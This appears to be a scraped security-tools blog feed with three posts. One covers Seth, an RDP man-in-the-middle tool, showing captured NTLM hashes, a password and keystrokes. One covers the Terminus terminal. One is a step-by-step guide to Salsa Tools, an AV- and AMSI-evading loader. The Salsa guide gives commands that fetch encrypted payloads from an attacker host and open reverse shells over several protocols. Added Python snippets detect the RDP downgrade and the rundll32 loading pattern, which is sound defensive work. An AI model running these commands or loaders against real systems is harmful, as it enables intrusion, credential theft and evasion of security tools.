    (SETH ASCII banner: by Adrian Vollmer, seth@vollmer.syss.de, SySS GmbH, 2017, https://www.syss.de)

    [*] Spoofing arp replies...
    [*] Turning on IP forwarding...
    [*] Set iptables rules for SYN packets...
    [*] Waiting for a SYN packet to the original destination...
    [+] Got it!
    Original destination is 192.168.57.102
    [*] Clone the x509 certificate of the original destination...
    [*] Adjust the iptables rule for all packets...
    [*] Run RDP proxy...
    Listening for new connection
    Connection received from 192.168.57.103:50431
    Downgrading authentication options from 11 to 3
    Enable SSL
    alice::avollmer-syss:1f20645749b0dfd5:b0d3d5f1642c05764ca28450f89d38db:[...] with NTLM response
    TLS alert access denied, Downgrading CredSSP
    Connection lost
    Connection received from 192.168.57.103:50409
    Listening for new connection
    Enable SSL
    Connection lost
    Connection received from 192.168.57.103:50410
    Listening for new connection
    Enable SSL
    Hiding forged protocol request from client
    .\alice:ilovebob
    Keyboard Layout: 0x409 (English_United_States)
    Key press: LShift
    Key press: S
    Key release: S
    Key release: LShift
    Key press: E
    Key release: E
    Key press: C
    Key release: C
    Key press: R
    Key release: R
    Key press: E
    Key release: E
    Key press: T
    Key release: T
    Connection lost
    [*] Cleaning up...
    [*] Done.

Requirements
- python3
- tcpdump
- arpspoof (arpspoof is part of dsniff)
- openssl

Disclaimer
Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.
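The "Downgrading authentication options from 11 to 3" line above refers to the requestedProtocols bitmask in the X.224 connection request that opens every RDP session (SSL=1, HYBRID=2, HYBRID_EX=8; HYBRID means CredSSP, i.e. NLA). A network sensor or a server-side audit can parse that exchange and tell an NLA session from one where NLA was never enforced or was stripped on the wire. This is an added example, not Seth's code: the PDUs are constructed by build_cr()/build_cc() for the demonstration.

```python
import struct
# Added example, not Seth's own code: parse the X.224 connection request and
# confirm (MS-RDPBCGR rdpNegReq/rdpNegRsp) that open an RDP session and report
# the security-protocol negotiation. PDUs are constructed by build_cr/build_cc.

PROTOCOLS = {1: "SSL", 2: "HYBRID", 4: "RDSTLS", 8: "HYBRID_EX"}
NLA_MASK = 2 | 8                      # HYBRID* = CredSSP, i.e. NLA in use
X224_CR, X224_CC = 0xE0, 0xD0         # connection request / confirm codes

def describe(proto):
    names = [n for bit, n in PROTOCOLS.items() if proto & bit]
    return "|".join(names) if names else "RDP(standard security)"

def parse_negotiation(pdu):
    """TPKT + X.224 CR/CC -> (tpdu_code, neg_type, protocols). neg_type is
    1 for rdpNegReq, 2 for rdpNegRsp, 3 for rdpNegFailure, None if absent."""
    version, _, length = struct.unpack(">BBH", pdu[:4])
    if len(pdu) < 11 or version != 3 or length != len(pdu) or pdu[5] not in (X224_CR, X224_CC):
        raise ValueError("not a TPKT-framed X.224 CR/CC")
    body = pdu[11:]                    # skip LI, code, dst-ref, src-ref, class
    if pdu[5] == X224_CR and not body.startswith(b"\x01"):
        body = body.partition(b"\r\n")[2]   # skip routingToken / cookie
    if len(body) < 8:                  # legacy client: no negotiation at all
        return pdu[5], None, 0
    neg_type, _flags, neg_len, value = struct.unpack("<BBHI", body[:8])
    if neg_len != 8:
        raise ValueError("bad rdpNeg length")
    return pdu[5], neg_type, value

def assess(client_cr, server_cc):
    """Compare what the client offered with what ended up selected."""
    _, _, requested = parse_negotiation(client_cr)
    _, rsp_type, selected = parse_negotiation(server_cc)
    findings = []
    if rsp_type != 2:
        findings.append("no rdpNegRsp: negotiation failed or legacy server")
    elif requested & NLA_MASK and not selected & NLA_MASK:
        findings.append("client offered %s but %s was selected: NLA not enforced"
                        " or stripped in transit" % (describe(requested), describe(selected)))
    return {"requested": requested, "selected": selected, "findings": findings}

def requested_protocols_changed(cr_at_client, cr_at_server):
    """Same CR captured on both sides of the path: flags were removed en route."""
    a = parse_negotiation(cr_at_client)[2]
    b = parse_negotiation(cr_at_server)[2]
    return a != b and (a & b) == b

def build_cr(requested, user="alice"):
    """Constructed client CR with an mstshash cookie and rdpNegReq."""
    x224 = bytes([X224_CR, 0, 0, 0, 0, 0]) + b"Cookie: mstshash=" + user.encode() \
        + b"\r\n" + struct.pack("<BBHI", 1, 0, 8, requested)
    body = bytes([len(x224)]) + x224
    return struct.pack(">BBH", 3, 0, 4 + len(body)) + body

def build_cc(selected):
    """Constructed server CC carrying rdpNegRsp."""
    x224 = bytes([X224_CC, 0, 0, 0, 0, 0]) + struct.pack("<BBHI", 2, 0, 8, selected)
    body = bytes([len(x224)]) + x224
    return struct.pack(">BBH", 3, 0, 4 + len(body)) + body
```

assess(build_cr(11), build_cc(1)) reproduces the situation in the demo (client offered NLA, TLS-only selected) and returns one finding, whereas a server that enforces NLA answers with HYBRID and produces none; requested_protocols_changed(build_cr(11), build_cr(3)) is the two-vantage-point check for the 11-to-3 rewrite.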

Link: http://feedproxy.google.com/~r/PentestTools/~3/otGqqcWw2mo/seth-perform-mitm-attack-and-extract.html

Terminus – A Terminal For A More Modern Age

Terminus is a highly configurable terminal emulator for Windows, macOS and Linux.
- Theming and color schemes
- Fully configurable shortcuts
- Split panes
- Remembers your tabs
- PowerShell (and PS Core), WSL, Git-Bash, Cygwin, Cmder and CMD support
- Integrated SSH client and connection manager
- Full Unicode support including double-width characters
- Doesn't choke on fast-flowing outputs
- Proper shell experience on Windows including tab completion (via Clink)

Terminus is an alternative to Windows' standard terminal (conhost), PowerShell ISE, PuTTY or iTerm.

Terminus is not a new shell or a MinGW or Cygwin replacement. Neither is it lightweight; if RAM usage is of importance, consider Conemu or Alacritty.

Plugins
Plugins and themes can be installed directly from the Settings view inside Terminus.
- clickable-links – makes paths and URLs in the terminal clickable
- shell-selector – a quick shell selector pane
- title-control – allows modifying the title of the terminal tabs by providing a prefix, suffix, and/or strings to be removed
- quick-cmds – quickly send commands to one or all terminal tabs
- save-output – record terminal output into a file
- scrollbar – adds a scrollbar to hterm tabs

Themes
- hype – a Hyper inspired theme
- relaxed – the Relaxed theme for Terminus
- gruvbox
- windows10
- altair

Link: http://feedproxy.google.com/~r/PentestTools/~3/H3gcYftgMws/terminus-terminal-for-more-modern-age.html

Salsa Tools – ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP and AV bypass, AMSI patched

Salsa Tools is a collection of three different tools that, combined, allow you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for its execution. In order to avoid the latest detection techniques (AMSI), most of the components were initially written in C#. Salsa Tools was publicly released by Luis Vacas during his talk "Inmersión en la explotación tiene rima", which took place at h-c0n on 9th February 2019.

Features
- TCP/UDP/ICMP/DNS/BIND/SSL
- AV Safe (17th February)
- AMSI patchers
- PowerShell execution
- ...

Overview
Salsa-Tools is made from three different ingredients:
- EvilSalsa
- EncrypterAssembly
- SalseoLoader

And its behavior is as follows: (diagram not reproduced in this post)

Setup
Requirements
- Visual Studio 2017 (or similar)
- Python 2.7

Running la Salsa
Cooking EvilSalsa

    (EvilSalsa ASCII banner)
    [+] That is our Payload

EvilSalsa is the key ingredient of this recipe. It contains the payload, which is executed on the system as follows: as soon as the payload starts, it runs System.Management.Automation.dll, which creates a runspace. Within that runspace we have four types of shells (TCP / UDP / ICMP / DNS / BINDTCP). Once EvilSalsa is loaded, the first thing it does is check for the existence of c:\windows\system32\amsi.dll.
If it exists, it is patched using a home-cooked variant of the CyberArk and Rastamouse bypasses.

Mixing EncrypterAssembly and EvilSalsa

    (EncrypterAssembly ASCII banner)
    [+] Software that encrypts the payload using RC4
    [+] We have the version in python and the version in .exe

EncrypterAssembly can be used as a Python script or as an Exe binary. It encrypts the previously generated EvilSalsa.

Python usage:

    python encrypterassembly.py <PASSWORD> <OUTPUT>

Executable usage:

    Encrypterassembly.exe <FILE> <PASSWORD> <OUTPUT>

Bringing the Encrypted EvilSalsa to the table with SalseoLoader
SalseoLoader is in charge of loading the encrypted payload. It can be compiled either as a library or as an executable. If it is run as an executable, the chosen arguments must be provided when the executable is run. If it is compiled as a library, the descriptor "main" must be exported, and arguments are passed using environment variables.

    (SalseoLoader ASCII banner)
    By: CyberVaca@HackPlayers
    [+] Usage:
      [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
      [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
      [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
      [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
      [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
      [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
      [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
    [+] Shells available:
      [-] ReverseTCP
      [-] ReverseDNS
      [-] ReverseSSL
      [-] Shellcode
      [-] ReverseUDP
      [-] ReverseICMP
      [-] BindTCP

Tutorial
Compiling the binaries
Download the source code from GitHub and compile EvilSalsa and SalseoLoader. You will need Visual Studio installed to compile the code.

Compile those projects for the architecture of the Windows box where you are going to use them (if the Windows box supports x64, compile them for that architecture). You can select the architecture inside Visual Studio in the left "Build" tab under "Platform Target". (If you can't find this option, click the "Project" tab and then "Properties".)

Then, build both projects (Build -> Build Solution). The path of the executable will appear in the logs.

Prepare the Backdoor
First of all, you will need to encode the EvilSalsa.dll.
To do so, you can use the python script encrypterassembly.py or you can compile the project EncrypterAssembly.

Python:

    python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
    python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txt

Windows:

    EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
    EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txt

Ok, now you have everything you need to execute the whole Salseo thing: the encoded EvilSalsa.dll and the binary of SalseoLoader. Upload the SalseoLoader.exe binary to the machine. It shouldn't be detected by any AV...

Execute the backdoor
Getting a TCP reverse shell (downloading encoded dll through HTTP)
Remember to start a nc as the reverse shell listener, and an HTTP server to serve the encoded evilsalsa.

    SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

Getting a UDP reverse shell (downloading encoded dll through SMB)
Remember to start a nc as the reverse shell listener, and an SMB server to serve the encoded evilsalsa (impacket-smbserver).

    SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

Getting a TCP reverse shell over SSL (using local file)
Set the listener inside the attacker machine:

    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
    openssl s_server -key key.pem -cert cert.pem -port <port> -tls1

Execute the backdoor:

    SalseoLoader.exe password C:/path/to/evilsalsa.dll.txt ReverseSSL <Attacker-IP> <Port>

Getting an ICMP reverse shell (encoded dll already inside the victim)
This time you need a special tool on the client to receive the reverse shell.
Download: https://github.com/inquisb/icmpsh

Disable ICMP replies:

    sysctl -w net.ipv4.icmp_echo_ignore_all=1
    # When you are finished, you can enable them again by running:
    sysctl -w net.ipv4.icmp_echo_ignore_all=0

Execute the client:

    python icmpsh_m.py "<Attacker-IP>" "<Victim-IP>"

Inside the victim, let's execute the salseo thing:

    SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

Compiling SalseoLoader as a DLL exporting the main function
Open the SalseoLoader project using Visual Studio.

Add [DllExport] before the main function
Before the main function add this line: [DllExport]

Install DllExport for this project
Tools --> NuGet Package Manager --> Manage NuGet Packages for Solution...
Search for the DllExport package (using the Browse tab) and press Install (and accept the popup).
The files DllExport.bat and DllExport_Configure.bat will have appeared in your project folder.

Uninstall DllExport
Press Uninstall (yeah, it's weird, but trust me, it is necessary).

Exit Visual Studio and execute DllExport_Configure
Just exit Visual Studio.
Then, go to your SalseoLoader folder and execute DllExport_Configure.bat.
Select x64 (if you are going to use it inside an x64 box, as was my case), select System.Runtime.InteropServices (inside Namespace for DllExport) and press Apply.

Open the project again with Visual Studio
[DllExport] should no longer be marked as an error.

Build the solution
Select Output Type = Class Library (Project --> SalseoLoader Properties --> Application --> Output type = Class Library).
Select x64 platform (Project --> SalseoLoader Properties --> Build --> Platform target = x64).
To build the solution: Build --> Build Solution (the path of the new DLL will appear in the Output console).

Test the generated Dll
Copy and paste the Dll where you want to test it.
Execute:

    rundll32.exe SalseoLoader.dll,main

If no error appears, you probably have a functional dll!!

Get a shell using the Dll
Don't forget to use an HTTP server and set a nc listener.

Powershell:

    $env:pass="password"
    $env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
    $env:lhost="10.2.0.5"
    $env:lport="1337"
    $env:shell="reversetcp"
    rundll32.exe SalseoLoader.dll,main

CMD: (the CMD variant of these commands is not included in this post)

Documented by https://github.com/carlospolop-forks/
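Two things in the procedure above are visible to endpoint telemetry regardless of the encryption layer: rundll32.exe being pointed at a DLL that lives outside the Windows system directories (here a relative SalseoLoader.dll resolved against the current directory), and the PowerShell runtime, System.Management.Automation.dll, being loaded into a host process that is not PowerShell. The following is an added example, not part of Salsa Tools, that applies both checks to constructed Sysmon-style records (field names follow Sysmon; the paths and records are made up for the example).

```python
import ntpath
import re
# Added example, not part of Salsa Tools: detection logic for the execution
# pattern described above (rundll32 loading a user-supplied DLL, and the
# PowerShell runtime appearing inside a non-PowerShell host), run over
# constructed Sysmon-style records (EventID 1 process create, 7 image load).

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
RUNDLL_CMD = re.compile(r'^\s*"?[^"\s]*rundll32\.exe"?\s+(.*)$', re.I)
DLL_EXPORT = re.compile(r'^\s*"?(?P<dll>[^",]+?)"?\s*,\s*(?P<export>\S+)')

def rundll32_target(cmdline):
    """'rundll32.exe X.dll,entry' -> ('X.dll', 'entry'); None if not rundll32."""
    m = RUNDLL_CMD.match(cmdline)
    m = DLL_EXPORT.match(m.group(1)) if m else None
    return (m.group("dll"), m.group("export")) if m else None

def check_process_create(ev):
    """Flag rundll32 invoking a DLL that does not live in a Windows system dir."""
    target = rundll32_target(ev["CommandLine"])
    if not target:
        return None
    dll, export = target
    if dll.lower().startswith(SYSTEM_DIRS):
        return None
    if not ntpath.isabs(dll):          # relative name resolves against the CWD
        dll = ntpath.join(ev.get("CurrentDirectory", ""), dll)
    return "rundll32 loading non-system DLL %s (export %s), parent %s" % (
        dll, export, ntpath.basename(ev["ParentImage"]))

def check_image_load(ev):
    """Flag System.Management.Automation(.ni).dll loaded by anything but PowerShell."""
    loaded = ntpath.basename(ev["ImageLoaded"]).lower()
    host = ntpath.basename(ev["Image"]).lower()
    if loaded.startswith("system.management.automation") and host not in POWERSHELL_HOSTS:
        return "PowerShell runtime loaded into %s" % host
    return None

def analyze(events):
    checks = {1: check_process_create, 7: check_image_load}
    alerts = []
    for ev in events:
        alert = checks.get(ev["EventID"], lambda _e: None)(ev)
        if alert:
            alerts.append(alert)
    return alerts
# Constructed records; paths and names are made up for this example.
CONSTRUCTED_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe SalseoLoader.dll,main",
     "CurrentDirectory": "C:\\Users\\bob\\Downloads\\",
     "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL",
     "CurrentDirectory": "C:\\", "ParentImage": "C:\\Windows\\explorer.exe"},
    {"EventID": 7, "Image": "C:\\Windows\\System32\\rundll32.exe",
     "ImageLoaded": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\System.Management.Automation.dll"},
    {"EventID": 7, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ImageLoaded": "C:\\Windows\\assembly\\NativeImages\\System.Management.Automation.ni.dll"},
]
```

analyze(CONSTRUCTED_EVENTS) returns exactly two alerts: the SalseoLoader.dll launch from the Downloads folder with powershell.exe as parent, and the PowerShell runtime appearing inside rundll32.exe; the legitimate shell32.dll call and PowerShell loading its own runtime stay silent.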

Link: http://feedproxy.google.com/~r/PentestTools/~3/Xgz-WkNK1wE/salsa-tools-shellreverse.html